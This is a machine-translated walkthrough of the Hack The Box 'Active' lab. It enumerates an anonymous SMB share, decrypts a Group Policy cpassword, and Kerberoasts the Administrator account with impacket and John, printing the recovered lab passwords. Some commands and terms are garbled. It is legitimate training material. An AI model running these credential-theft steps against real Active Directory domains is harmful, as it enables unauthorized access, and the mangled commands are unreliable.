Basic information

Hack The Box is an online penetration testing platform. It can help you improve your penetration testing skills and black box testing skills. The platform environment is a simulated real environment, which helps you better adapt to the penetration in the real environment. Link: www.hackthebox.eu/home/machin… Description:

Note: there is no network security, there is no national security, in order to consolidate the national security protection for the computer infiltration, all behavior is through the platform authorization permit for infiltration. I will use Kali Linux as the attacker machine to tackle this HTB. The techniques used here are for learning educational purposes only and no responsibility is taken if the techniques listed are used for any other purpose.

I. Information collection

1. IP of target aircraft

Based on basic information, the IP address of the target plane is 10.10.10.100

2. Open ports and services

Nmap-ss-sv-a-o 10.10.10.100 -o xb.logCopy the code

The NMAP scan shows that active. HTB is installed in the AD domain and has SMB service \ open

Ii. Vulnerability detection and utilization

Try using an SMB relay attack to see if you can get useful information

Smbmap -h 10.10.10.100Copy the code

Discover can log in to Replication

The smbclient / / 10.10.10.100 / ReplicationCopy the code

Log in anonymously to Replication\ using smbClient

Find groups.xml in \active. HTB \Policies{31b2f340-016D-11d2-945F-00c04fb984f9}\MACHINE\Preferences\Groups\

Download the file locally for viewing \

Found a user with password \

Cpassword is a group policy password that can be cracked using the tools provided by Kali

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Copy the code

Obtain plaintext password: GPPstillStandingStrong2k18 \

Log in to user SVC_TGS using smbClient

The smbclient / / 10.10.10.100 / Users - U SVC_TGSCopy the code

User.txt was found under user SVC_TGS

Download to this machine for viewing \

By the user. TXT \

Three, right

After collecting the information of the user, I found that no information could be used. When I looked back at the scan results of NMAP, I found that Port 88 opened the Kerberoas service \

Administrator Kerberos credentials can be obtained from impacket using getUserSpns.py

Impacket links:Github.com/SecureAuthC…

After obtaining the key certificate, use John to crack and obtain the plaintext

vim pass.txt
john pass.txt --wordlist=/usr/share/wordlists/rockyou.txt
Copy the code

Use this password to log in: Ticketmaster1968

The smbclient -u administrator / / 10.10.10.100 / UsersCopy the code

Get to the root. TXT \